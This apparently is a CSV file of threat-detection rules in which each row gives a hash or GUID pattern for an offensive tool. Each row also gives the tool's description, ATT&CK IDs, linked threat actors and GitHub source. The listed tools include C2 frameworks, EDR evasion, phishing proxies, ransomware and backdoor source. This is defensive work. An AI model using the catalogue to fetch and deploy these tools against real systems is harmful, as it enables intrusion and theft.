"*81E60DC6-694E-4F51-88FA-6F481B9A4208*",".{0,1000}81E60DC6\-694E\-4F51\-88FA\-6F481B9A4208.{0,1000}","offensive_tool_keyword","UnhookingPatch","Bypass EDR Hooks by patching NT API stub and resolving SSNs and syscall instructions at runtime","T1055 - T1574","TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/SaadAhla/UnhookingPatch","1","0","#GUIDproject","N/A","8","4","304","52","2023-08-02T02:25:38Z","2023-02-08T16:21:03Z","30014"
"*81E60DC6-694E-4F51-88FA-6F481B9A4208*",".{0,1000}81E60DC6\-694E\-4F51\-88FA\-6F481B9A4208.{0,1000}","offensive_tool_keyword","UnhookingPatch","Bypass EDR Hooks by patching NT API stub and resolving SSNs and syscall instructions at runtime","T1055 - T1055.001 - T1070 - T1070.004 - T1211","TA0005","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/UnhookingPatch","1","0","#GUIDproject","N/A","9","4","304","52","2023-08-02T02:25:38Z","2023-02-08T16:21:03Z","30015"
"*81f9ec1160d8019b6279927295f308a0697e132b3f09876e9d1e4b2e2192be55*",".{0,1000}81f9ec1160d8019b6279927295f308a0697e132b3f09876e9d1e4b2e2192be55.{0,1000}","offensive_tool_keyword","pretender","MitM sidekick for relaying attacks featuring DHCPv6 DNS takeover as well as mDNS - LLMNR and NetBIOS-NS spoofing","T1557 - T1046 - T1590 - T1557.002","TA0008 - TA0011 - TA0007 - TA0009","N/A","N/A","Sniffing & Spoofing","https://github.com/RedTeamPentesting/pretender","1","0","#filehash","N/A","7","10","1089","79","2025-02-19T08:14:57Z","2022-07-11T13:23:23Z","30019"
"*81fc4f198955aef68c590f3c04dc1fd4184a7e7b55648a67422a51f3dcf79382*",".{0,1000}81fc4f198955aef68c590f3c04dc1fd4184a7e7b55648a67422a51f3dcf79382.{0,1000}","offensive_tool_keyword","RealBlindingEDR","AV/EDR evasion","T1562.001 - T1548.001","TA0005 - TA0004","N/A","N/A","Defense Evasion","https://github.com/myzxcg/RealBlindingEDR","1","0","#filehash","N/A","10","10","1050","190","2024-06-21T03:16:55Z","2023-10-28T07:06:53Z","30020"
"*82120dbb875df3481d154d0cc4d420c3835a57534f8ab2e9795f239b58d5987a*",".{0,1000}82120dbb875df3481d154d0cc4d420c3835a57534f8ab2e9795f239b58d5987a.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","30024"
"*8213d434f255fbfba9d5432770a6b4ff85463271047384feba7176a301436634*",".{0,1000}8213d434f255fbfba9d5432770a6b4ff85463271047384feba7176a301436634.{0,1000}","offensive_tool_keyword","PySQLRecon","Offensive MSSQL toolkit written in Python, based off SQLRecon","T1040 - T1078 - T1072 - T1223 - T1059 - T1213","TA0001 - TA0002 - TA0007 - TA0009","N/A","N/A","Exploitation tool","https://github.com/Tw1sm/PySQLRecon","1","0","#filehash","N/A","10","3","201","15","2025-01-12T02:14:59Z","2023-09-03T01:14:35Z","30025"
"*8215225624132cd5a3c16699071178bea0fc91cd6195f67d1a5e8094142dcfe1*",".{0,1000}8215225624132cd5a3c16699071178bea0fc91cd6195f67d1a5e8094142dcfe1.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","30026"
"*8219b80a1dc5a84380f9c5af9e7204e0e2029a173e8ddad57c32a722564832ce*",".{0,1000}8219b80a1dc5a84380f9c5af9e7204e0e2029a173e8ddad57c32a722564832ce.{0,1000}","offensive_tool_keyword","C3","Framework designed for red teams to create and manage custom C2 (Command and Control) channels. Unlike traditional C2 frameworks that rely on typical communication methods like HTTP/S DNS or TCP -  C3 allows for the creation of non-traditional and esoteric C2 channels using platforms like Slack Dropbox GitHub OneDrive and more.","T1071 - T1102 - T1090 - T1573 - T1048","TA0011 - TA0002 - TA0005 - TA0010","N/A","N/A","C2","https://github.com/WithSecureLabs/C3","1","0","#filehash","N/A","9","10","1602","276","2023-03-04T20:32:13Z","2019-08-30T11:21:04Z","30027"
"*821a3a1dee846b299275f7cc29f51b3d20c651db082832b904ea15f8a73ad9bb*",".{0,1000}821a3a1dee846b299275f7cc29f51b3d20c651db082832b904ea15f8a73ad9bb.{0,1000}","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0001","N/A","BlackCat - COLDRIVER","Phishing","https://github.com/kgretzky/evilginx2","1","0","#filehash","N/A","10","10","12879","2234","2025-01-21T15:16:19Z","2018-07-10T09:59:52Z","30028"
"*8221def0e258e6b6b170cc5ea499e9744e527dda36524b06ff2bce9421a70f2e*",".{0,1000}8221def0e258e6b6b170cc5ea499e9744e527dda36524b06ff2bce9421a70f2e.{0,1000}","offensive_tool_keyword","sharphound","C# Data Collector for BloodHound","T1087.001 - T1087.002 - T1482 - T1016 - T1018 - T1046","TA0007 - TA0043 - TA0005 - TA0042","Dispossessor - Trickbot - Dridex - Locky - Uyghur - BlackCat - ALPHV - Defray777 - RansomExx","APT20 - TA505 - APT29 - GOLD DUPONT - Scattered Spider - UNC3944 - TA2101 - Wizard Spider - Grim Spider - Lunar Spider - Dispossessor","Discovery","https://github.com/BloodHoundAD/SharpHound","1","0","#filehash","N/A","N/A","10","904","195","2025-04-18T20:45:04Z","2021-07-12T17:07:04Z","30029"
"*82277B35-D159-4B44-8D54-FB66EDD58D5C*",".{0,1000}82277B35\-D159\-4B44\-8D54\-FB66EDD58D5C.{0,1000}","offensive_tool_keyword","FilelessPELoader","Loading Remote AES Encrypted PE in memory - Decrypted it and run it","T1027.001 - T1059.001 - T1071","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/FilelessPELoader","1","0","#GUIDproject","N/A","10","10","933","196","2023-08-29T21:46:11Z","2023-02-08T16:59:33Z","30031"
"*8227f4b2d421a5bfb565d45f8abccd5d0cbda6e2fe6a4caab5bb6078158245d2*",".{0,1000}8227f4b2d421a5bfb565d45f8abccd5d0cbda6e2fe6a4caab5bb6078158245d2.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","30032"
"*82296b7a1d8b420d648c3ca0aa9f6560d11729d3fb97f534f03afd10a6d6460b*",".{0,1000}82296b7a1d8b420d648c3ca0aa9f6560d11729d3fb97f534f03afd10a6d6460b.{0,1000}","offensive_tool_keyword","OSEP-Code-Snippets","notable code snippets for Offensive Security's PEN-300 (OSEP) course","T1116 - T1204.002 - T1027.009 - T1021.005 - T1560.001 - T1100 - T1003.001 - T1564.001 - T1047 - T1210 - T1134.002 - T1055 - T1055.011 - T1055.012 - T1204","TA0005 - TA0040 - TA0008 - TA0003 - TA0006 - TA0004","N/A","N/A","Exploitation tool","https://github.com/chvancooten/OSEP-Code-Snippets","1","0","#filehash","N/A","8","10","1254","444","2024-01-04T15:17:17Z","2021-03-10T21:34:41Z","30034"
"*822d1259e7b03a5113743e2840d3338236159670d94aaf41431b7d6391268300*",".{0,1000}822d1259e7b03a5113743e2840d3338236159670d94aaf41431b7d6391268300.{0,1000}","offensive_tool_keyword","Carbanak","remote backdoor used by a group of the same name (Carbanak). It is intended for espionage - data exfiltration and providing remote access to infected machines","T1021.002 - T1071.001 - T1105 - T1059 - T1003 - T1078 - T1041","TA0006 - TA0008 - TA0010 - TA0011","Carbanak","FIN7 - Carbanak","Malware","https://github.com/0x25bit/Updated-Carbanak-Source-with-Plugins","1","0","#filehash","N/A","10","4","396","223","2019-05-01T23:31:35Z","2019-04-22T21:01:08Z","30035"
"*8231ce10a57076634d408749cd0a06eb178c2f0af84ea8d7284651bbd8320c39*",".{0,1000}8231ce10a57076634d408749cd0a06eb178c2f0af84ea8d7284651bbd8320c39.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","30036"
"*823c3d2bbca46e7aedadfef6893babcbf14b0182e598a9ba958b84892daaeeb1*",".{0,1000}823c3d2bbca46e7aedadfef6893babcbf14b0182e598a9ba958b84892daaeeb1.{0,1000}","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0001","N/A","BlackCat - COLDRIVER","Phishing","https://github.com/An0nUD4Y/evilginx2","1","0","#filehash","N/A","10","","N/A","","","","30037"
"*8245a0542c25505872414878bbb0bac624145b348d83e458a079732c9c457924*",".{0,1000}8245a0542c25505872414878bbb0bac624145b348d83e458a079732c9c457924.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","#filehash","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","30038"
"*824887ee1daa53cde973218847328c1e159926dba2fb50fa3d5dff2b9d7c40c4*",".{0,1000}824887ee1daa53cde973218847328c1e159926dba2fb50fa3d5dff2b9d7c40c4.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","30039"
"*8248D38639F4808913BB926B20C9AB1B31908BCE8C3A564FF496A8883DE01C97*",".{0,1000}8248D38639F4808913BB926B20C9AB1B31908BCE8C3A564FF496A8883DE01C97.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR  - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","0","#filehash","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","30040"
"*825790dbcdf9b7a69b9a566f71bc167a0a8353e735390c5815b247ac58efa817*",".{0,1000}825790dbcdf9b7a69b9a566f71bc167a0a8353e735390c5815b247ac58efa817.{0,1000}","offensive_tool_keyword","Termite","Termite rootit abused by threat actors","T1014 - T1069 - T1055","TA0005 - TA0003 - TA0004","Operation TunnelSnake","Whitefly","Persistence","https://github.com/rootkiter/Binary-files/tree/212c43b40e2e4c2e2703400caaa732557b6080a4","1","0","#filehash","N/A","10","10","156","177","2021-01-26T23:16:49Z","2019-01-03T05:01:20Z","30042"
"*825b4d331afd5cd191607e13cf649bceb7aa5eaf90451538a8953b5052ca7502*",".{0,1000}825b4d331afd5cd191607e13cf649bceb7aa5eaf90451538a8953b5052ca7502.{0,1000}","offensive_tool_keyword","antSword","cross-platform website management toolkit - abused by attackers - supports the use of web shells","T1505.003 - T1059 - T1100 - T1027 - T1219 - T1071","TA0002 - TA0003 - TA0005 - TA0011","antSword webshell","APT41 - APT15","C2","https://github.com/AntSwordProject/antSword","1","0","#filehash","N/A","10","10","4010","616","2025-01-20T12:48:42Z","2016-03-11T09:28:00Z","30043"
"*825E2088-EC7C-4AB0-852A-4F1FEF178E37*",".{0,1000}825E2088\-EC7C\-4AB0\-852A\-4F1FEF178E37.{0,1000}","offensive_tool_keyword","SharpGraphView","Microsoft Graph API post-exploitation toolkit","T1078.004 - T1114.002","TA0001 - TA0003  - TA0006 - TA0008 - TA0007 - TA0010","N/A","N/A","Discovery","https://github.com/mlcsec/SharpGraphView","1","0","#GUIDproject","N/A","6","1","94","9","2024-07-13T12:27:38Z","2024-05-04T11:23:42Z","30044"
"*82662ee50b98d617aa8f7859c65bb88030e6a68fe72cf4c7fef5fc94da350046*",".{0,1000}82662ee50b98d617aa8f7859c65bb88030e6a68fe72cf4c7fef5fc94da350046.{0,1000}","offensive_tool_keyword","FudgeC2","FudgeC2 - a command and control framework designed for team collaboration and post-exploitation activities.","T1021.002 - T1105 - T1059.001 - T1059.003","TA0008 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/Ziconius/FudgeC2","1","0","#filehash","N/A","10","10","253","54","2023-05-01T21:13:56Z","2018-09-09T21:05:21Z","30046"
"*826b9353f66c3b17151b57e87e656314b6ec0397dcfb5cb2f61faa6cf92c7c91*",".{0,1000}826b9353f66c3b17151b57e87e656314b6ec0397dcfb5cb2f61faa6cf92c7c91.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","30047"
"*826c1daf512bcd2152b6328fc55b1ed403ed41fd1a6fc1afa6e35f34e4b9f8bc*",".{0,1000}826c1daf512bcd2152b6328fc55b1ed403ed41fd1a6fc1afa6e35f34e4b9f8bc.{0,1000}","offensive_tool_keyword","IPPrintC2","PoC for using MS Windows printers for persistence / command and control via Internet Printing","T1090 - T1133 - T1547.012 - T1572","TA0011 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/Diverto/IPPrintC2","1","0","#filehash","N/A","10","10","146","20","2024-05-03T11:13:38Z","2024-05-03T09:13:10Z","30048"
"*826edaeac303c78994a597c1e2ea0ce81c4ab628138b78677517661c32653523*",".{0,1000}826edaeac303c78994a597c1e2ea0ce81c4ab628138b78677517661c32653523.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","30049"
"*827310760fa3d7371a22ff5f06e406f3e0a6cbe1c7e7f38244e0334a2d5eca7d*",".{0,1000}827310760fa3d7371a22ff5f06e406f3e0a6cbe1c7e7f38244e0334a2d5eca7d.{0,1000}","offensive_tool_keyword","DirtyCLR","An App Domain Manager Injection DLL PoC","T1055.001 - T1546.016 - T1055.013","TA0005 - TA0004","N/A","Black Basta","Privilege Escalation","https://github.com/ipSlav/DirtyCLR","1","0","#filehash","N/A","7","2","170","19","2023-12-14T21:22:12Z","2023-12-11T11:29:36Z","30050"
"*827D241C-6A9B-48B0-BA8C-F21EF2849405*",".{0,1000}827D241C\-6A9B\-48B0\-BA8C\-F21EF2849405.{0,1000}","offensive_tool_keyword","Carbanak","remote backdoor used by a group of the same name (Carbanak). It is intended for espionage - data exfiltration and providing remote access to infected machines","T1021.002 - T1071.001 - T1105 - T1059 - T1003 - T1078 - T1041","TA0006 - TA0008 - TA0010 - TA0011","Carbanak","FIN7 - Carbanak","Malware","https://github.com/0x25bit/Updated-Carbanak-Source-with-Plugins","1","0","#GUIDproject","N/A","10","4","396","223","2019-05-01T23:31:35Z","2019-04-22T21:01:08Z","30051"
"*828411d980e653c3fa63dd031839e52ae1800b4f29f3b03f7acad492811dce2b*",".{0,1000}828411d980e653c3fa63dd031839e52ae1800b4f29f3b03f7acad492811dce2b.{0,1000}","offensive_tool_keyword","GraphSpy","Initial Access and Post-Exploitation Tool for AAD and O365 with a browser-based GUI","T1078.004 - T1110.003 - T1071.001 - T1566.002 - T1656","TA0001 - TA0006 - TA0003 - TA0005 - TA0008","N/A","N/A","Collection","https://github.com/RedByte1337/GraphSpy","1","0","#filehash","N/A","10","7","680","72","2025-04-15T21:07:15Z","2024-02-07T19:47:15Z","30052"
"*82855507e35b8f9645bd13b04b74a9cbb02afe3815d37ee7f4837aa7e97eeb10*",".{0,1000}82855507e35b8f9645bd13b04b74a9cbb02afe3815d37ee7f4837aa7e97eeb10.{0,1000}","offensive_tool_keyword","rotateproxy","A tool that uses fofa to search for socks5 open proxies and perform proxy pool rotation","T1071.001 - T1090 - T1095 - T1189","TA0011 - TA0010 - TA0005","N/A","N/A","Defense Evasion","https://github.com/akkuman/rotateproxy","1","0","#filehash","N/A","10","9","800","135","2024-01-24T05:47:37Z","2021-10-18T02:10:27Z","30054"
"*828aede9a7bc193899b66e8c10ac10d24398cf79575e771d9a970d3f9a4cdd92*",".{0,1000}828aede9a7bc193899b66e8c10ac10d24398cf79575e771d9a970d3f9a4cdd92.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4164","566","2025-03-08T14:00:06Z","2020-11-05T09:18:51Z","30055"
"*828c2d6318c0f827de40468b1bccf68a33851bd78d2dd218fb008f3928250d42*",".{0,1000}828c2d6318c0f827de40468b1bccf68a33851bd78d2dd218fb008f3928250d42.{0,1000}","offensive_tool_keyword","godpotato","GodPotato is an advanced privilege escalation tool that utilizes research on DCOM and builds upon years of Potato techniques. It enables privilege escalation to NT AUTHORITY\SYSTEM on Windows systems from 2012 to 2022 by leveraging the ImpersonatePrivilege permission. It addresses limitations of previous Potato versions and can run on almost any Windows OS by exploiting rpcss vulnerabilities.","T1134.001 - T1068  - T1055 - T1546.015","TA0004 - TA0006 - TA0011","Ghost Ransomware","N/A","Privilege Escalation","https://github.com/BeichenDream/GodPotato","1","0","#filehash","N/A","10","10","1938","236","2023-11-24T19:22:31Z","2022-12-23T14:37:00Z","30056"
"*828cd34ca798170da015728e4e85b2e6367ea3fac93946c0684ac643794ff3fb*",".{0,1000}828cd34ca798170da015728e4e85b2e6367ea3fac93946c0684ac643794ff3fb.{0,1000}","offensive_tool_keyword","specula","Specula is a C2 framework that allows for interactive operations of an implant that runs purely in the context of outlook","T1071.001 - T1105 - T1204 - T1548.002 - T1071 - T1562","TA0011 - TA0002 - TA0003 - TA0006 - TA0008 - TA0007 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/trustedsec/specula","1","0","#filehash","N/A","10","10","191","21","2024-09-23T09:25:33Z","2023-12-07T15:59:52Z","30057"
"*8299345196309b9e228c921f059aafbfdb9f0420253215aaf531309b1aded71d*",".{0,1000}8299345196309b9e228c921f059aafbfdb9f0420253215aaf531309b1aded71d.{0,1000}","offensive_tool_keyword","reconftw","reconFTW is a tool designed to perform automated recon on a target domain by running the best set of tools to perform scanning and finding out vulnerabilities","T1595 - T1590 - T1592 - T1596 - T1598 - T1046 - T1599 - T1213 - T1597","TA0043 - TA0042 - TA0007 - TA0001","N/A","N/A","Vulnerability Scanner","https://github.com/six2dez/reconftw","1","0","#filehash #linux","N/A","7","10","6202","982","2025-04-22T13:01:31Z","2020-12-30T23:52:52Z","30059"
"*829fc9a7c5aa66169fef3d816c6d1b6811a2d2f6ba89dbb5abc4a46e8dca82d7*",".{0,1000}829fc9a7c5aa66169fef3d816c6d1b6811a2d2f6ba89dbb5abc4a46e8dca82d7.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","30061"
"*82ab77802f301f210cd9368128c3ac453fb62f53af88fa912b411dcc3a9f8c0d*",".{0,1000}82ab77802f301f210cd9368128c3ac453fb62f53af88fa912b411dcc3a9f8c0d.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","30063"
"*82ac960f25131540ae230b2bac0f003ffc8edc8a05382d8831ff8e8ebf30996d*",".{0,1000}82ac960f25131540ae230b2bac0f003ffc8edc8a05382d8831ff8e8ebf30996d.{0,1000}","offensive_tool_keyword","prefetch-tool","Windows KASLR bypass using prefetch side-channel CVE-2024-21345 exploitation","T1564.007","TA0004","N/A","N/A","Privilege Escalation","https://github.com/exploits-forsale/prefetch-tool","1","0","#filehash","N/A","8","1","90","10","2024-04-26T05:40:32Z","2024-04-26T05:00:27Z","30064"
"*82af85387456fa6a4f598d88cd6f575803e1878d17aacd765c1c6fc19ab9edf3*",".{0,1000}82af85387456fa6a4f598d88cd6f575803e1878d17aacd765c1c6fc19ab9edf3.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","30066"
"*82B0EE92-347E-412F-8EA2-CBDE683EDA57*",".{0,1000}82B0EE92\-347E\-412F\-8EA2\-CBDE683EDA57.{0,1000}","offensive_tool_keyword","SignToolEx","Patching signtool.exe to accept expired certificates for code-signing","T1553.002 - T1649","TA0005","N/A","N/A","Defense Evasion","https://github.com/hackerhouse-opensource/SignToolEx","1","0","#GUIDproject","N/A","8","3","275","47","2024-07-19T17:22:28Z","2023-12-29T14:26:45Z","30067"
"*82b60e805fb8886732eedb461ae540482335cdaf0b3296e8388cbf416371e194*",".{0,1000}82b60e805fb8886732eedb461ae540482335cdaf0b3296e8388cbf416371e194.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","30070"
"*82b695eb37bf703a0c7fb9242f50aff9dfa000d464c5b2c368a8693a5d1adf63*",".{0,1000}82b695eb37bf703a0c7fb9242f50aff9dfa000d464c5b2c368a8693a5d1adf63.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","30071"
"*82C19CBA-E318-4BB3-A408-5005EA083EC5*",".{0,1000}82C19CBA\-E318\-4BB3\-A408\-5005EA083EC5.{0,1000}","offensive_tool_keyword","hidden-tear","open source ransomware - many variant in the wild","T1486 - T1059 - T1485 - T1489 - T1070 - T1488","TA0005 - TA0009 - TA0040 - TA0042","N/A","N/A","Ransomware","https://github.com/goliate/hidden-tear","1","0","#GUIDproject","N/A","10","8","765","394","2020-07-08T22:34:01Z","2015-08-19T09:06:51Z","30072"
"*82c7500571fe91c65c7d8a1eb771581a0f2ab73e35a91241fc14062fccdcd711*",".{0,1000}82c7500571fe91c65c7d8a1eb771581a0f2ab73e35a91241fc14062fccdcd711.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","30074"
"*82cff3a5c17a0c205a4b60bbcaa8f10494ba5bd0d38445e1227d65f944acd922*",".{0,1000}82cff3a5c17a0c205a4b60bbcaa8f10494ba5bd0d38445e1227d65f944acd922.{0,1000}","offensive_tool_keyword","ObfuscatedSharpCollection","obfuscated Sharp Offensive tools","T1003 - T1059 - T1087 - T1555 - T1078 - T1213 - T1569 - T1548 - T1071 - T1566","TA0006 - TA0005 - TA0003 - TA0002 - TA0004 - TA0008","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/ObfuscatedSharpCollection","1","0","#filehash","N/A","10","3","206","30","2025-04-18T03:11:19Z","2023-05-14T18:36:15Z","30075"
"*82d331f75a99d1547e0ccc3c3efd0a7a*",".{0,1000}82d331f75a99d1547e0ccc3c3efd0a7a.{0,1000}","offensive_tool_keyword","iodine","iodine. iodined - tunnel IPv4 over DNS","T1573.001 - T1573.002 - T1573.003 - T1573.004","TA0011 - TA0010 - TA0002 - TA0005","N/A","EMBER BEAR","C2","https://github.com/yarrick/iodine","1","0","#filehash","N/A","10","10","6413","524","2025-04-08T17:44:12Z","2012-02-04T19:51:39Z","30077"
"*82d3a3d0a5004b0079166839cdc9c570a6d861954f62f50d22053206a298c5f9*",".{0,1000}82d3a3d0a5004b0079166839cdc9c570a6d861954f62f50d22053206a298c5f9.{0,1000}","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0005 - TA0004","N/A","Evilnum","Defense Evasion","https://github.com/hfiref0x/UACME","1","0","#filehash","N/A","10","10","6711","1348","2025-03-09T03:33:26Z","2015-03-28T12:04:33Z","30078"
"*82d7b3b02f63138b68de51799ba42b9402ed8c9d899d5c0ea1797ff19e921685*",".{0,1000}82d7b3b02f63138b68de51799ba42b9402ed8c9d899d5c0ea1797ff19e921685.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","30079"
